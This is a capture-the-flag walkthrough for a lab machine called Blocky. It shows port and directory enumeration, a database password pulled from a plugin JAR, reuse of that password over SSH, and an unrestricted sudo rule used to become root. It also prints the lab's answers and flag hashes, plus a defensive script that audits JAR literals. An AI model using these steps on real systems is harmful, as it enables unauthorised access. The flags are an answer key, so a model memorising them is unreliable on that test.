Blocky
## user flag
### What is the name of the FTP software running on Blocky?
Start by enumerating the host with nmap.
```bash
❯ nmap -sCV -T4 10.129.6.2
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-27 22:34 +0900
Nmap scan report for 10.129.6.2
Host is up (0.12s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://blocky.htb
8192/tcp closed sophos
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 265.04 seconds
```
An FTP service is listening on port 21, but nmap reports it only as `ftp?` and gives no details, so connect to it directly with ftp.
```bash
❯ ftp 10.129.6.2
Connected to 10.129.6.2.
220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.129.6.2]
Name (10.129.6.2:nabeen):
```
A. ProFTPD
### What username is given by enumerating the website?
Add the following entry to /etc/hosts, then browse to http://blocky.htb/.

/etc/hosts

```
10.129.6.2 blocky.htb
```
The blog post's Author field contains a name (it is hard to spot visually, so search for it in the browser devtools).
A. notch
### What relative path on the webserver offers two JAR files for download?
Next, enumerate directories. I used gobuster this time; ffuf or dirb would of course work as well.
```bash
❯ gobuster dir -u http://10.129.6.2/ \
-H "Host: blocky.htb" \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-x jar,zip,txt,php,html \
-t 10 --timeout 15s --delay 100ms -b 403,404
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.6.2/
[+] Method: GET
[+] Threads: 10
[+] Delay: 100ms
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.8.2
[+] Extensions: txt,php,html,jar,zip
[+] Timeout: 15s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.php (Status: 301) [Size: 0] [--> http://blocky.htb/]
Progress: 13801 / 28500 (48.42%)[ERROR] error on word index.php: timeout occurred during the request
javascript (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/]
license.txt (Status: 200) [Size: 19935]
phpmyadmin (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
plugins (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]
readme.html (Status: 200) [Size: 7413]
```
/plugins looks suspicious, and opening it reveals the .jar files.
A. /plugins
### What password is present in the BlockCore.jar file?
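First, try the classic approach and run strings on the file, but it yields nothing useful. The output shows only the archive's member names, because a JAR is a ZIP archive and the class data inside it is compressed.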
```bash
❯ strings BlockyCore.jar
META-INF/MANIFEST.MF
LK-.
com/myfirstplugin/BlockyCore.class
@tF_
bgGo
![s}
n-cy
]wz"tF4
Y7Kg
qwI`
9P{[
META-INF/MANIFEST.MF
com/myfirstplugin/BlockyCore.classPK
```
Extract the archive and look inside. Much of the output is garbled, but something that looks like a password shows up.
```bash
unzip BlockyCore.jar -d blockycore
```

```bash
❯ cat blockycore/com/myfirstplugin/BlockyCore.class
����4-com/myfirstplugin/BlockyCorejava/lang/ObjectsqlHostLjava/lang/String;sqlUsersqlPass<init>()VCode
localhost
root
8YsqfCTnvxAUeduzjNSXe22
onServerStart LineNumberTableLocalVariableTablethisLcom/myfirstplugin/BlockyCore;
onServerStop
onPlayerJoi"TODO get usernam$!Welcome to the BlockyCraft!!!!!!!
&
'(
sendMessage'(Ljava/lang/String;Ljava/lang/String;)usernamemessage
SourceFileBlockyCore.java!
Q*�
*�*�*�▒�▒
▒
▒
*!#�%�▒
�▒
```
A. 8YsqfCTnvxAUeduzjNSXe22
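The reason `strings` comes up empty while the extracted class exposes the credential is that JAR members are deflate-compressed and string literals sit in the class file's constant pool. The script below is an added example, not code from the original write-up: it lists the string literals of every class in a JAR, the kind of check worth running on a plugin before publishing it under a web root. The sample JAR, `com/example/Demo.class` and the placeholder secret are constructed.

```python
import io
import struct
import zipfile

# Payload size in bytes for each fixed-width constant-pool tag (JVM spec 4.4).
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
         12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def string_constants(class_bytes):
    """Return the CONSTANT_String values (string literals in the source)."""
    magic, _minor, _major, count = struct.unpack_from(">IHHH", class_bytes, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    utf8, string_refs, pos, idx = {}, [], 10, 1
    while idx < count:
        tag = class_bytes[pos]
        pos += 1
        if tag == 1:  # CONSTANT_Utf8: u2 length followed by the bytes
            (n,) = struct.unpack_from(">H", class_bytes, pos)
            utf8[idx] = class_bytes[pos + 2:pos + 2 + n].decode("utf-8", "replace")
            pos += 2 + n
        elif tag in FIXED:
            if tag == 8:  # CONSTANT_String: u2 index of its Utf8 entry
                string_refs.append(struct.unpack_from(">H", class_bytes, pos)[0])
            pos += FIXED[tag]
        else:
            raise ValueError(f"unknown constant-pool tag {tag}")
        idx += 2 if tag in (5, 6) else 1  # long/double occupy two slots
    return [utf8[i] for i in string_refs if i in utf8]

def audit_jar(jar_bytes):
    """Map each .class member of a JAR to its string literals."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        return {name: string_constants(jar.read(name))
                for name in jar.namelist() if name.endswith(".class")}

def build_sample_jar():
    """Constructed sample: class-file header plus constant pool only."""
    u = lambda s: b"\x01" + struct.pack(">H", len(s)) + s.encode()
    pool = (u("sqlUser") + u("root") + b"\x08\x00\x02" +
            u("sqlPass") + u("CONSTRUCTED-PLACEHOLDER-SECRET") + b"\x08\x00\x05")
    blob = struct.pack(">IHHH", 0xCAFEBABE, 0, 52, 7) + pool
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr("com/example/Demo.class", blob)
    return buf.getvalue()

if __name__ == "__main__":
    for member, literals in audit_jar(build_sample_jar()).items():
        print(member, literals)
```

Any literal this reports that looks like a credential belongs in configuration or a secret store rather than in the compiled artifact.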
### Submit the flag located in the notch user’s home directory.
The password found above also works as notch's password, so log in over ssh and read the flag.
```bash
ssh [email protected]
```

```bash
notch@Blocky:~$ cat user.txt
242c17c4687257d95109b42f94714378
```
A. 242c17c4687257d95109b42f94714378
## root flag
### Is notch able to run sudo -i and get a shell as root?
It is a Yes or No question, so there is only one choice.
A. yes
### Submit the flag located in root’s home directory.
List the commands the user is allowed to run.
```bash
$ sudo -l
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User notch may run the following commands on Blocky:
(ALL : ALL) ALL
```
The entry is `(ALL : ALL) ALL`, so we know `sudo -i` will work. Become root and read the flag.
```bash
notch@Blocky:~$ sudo -i
[sudo] password for notch:
root@Blocky:~# ls
root.txt
root@Blocky:~# cat root.txt
e18f77dff1757b9f7dca578553a5dd00
```
A. e18f77dff1757b9f7dca578553a5dd00